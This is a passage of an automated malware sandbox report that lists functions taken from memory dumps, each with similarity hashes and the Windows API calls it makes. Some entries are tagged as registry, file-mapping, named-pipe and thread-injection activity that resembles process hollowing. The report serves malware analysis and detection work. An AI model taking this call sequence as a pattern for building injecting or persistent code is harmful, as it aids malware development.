  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
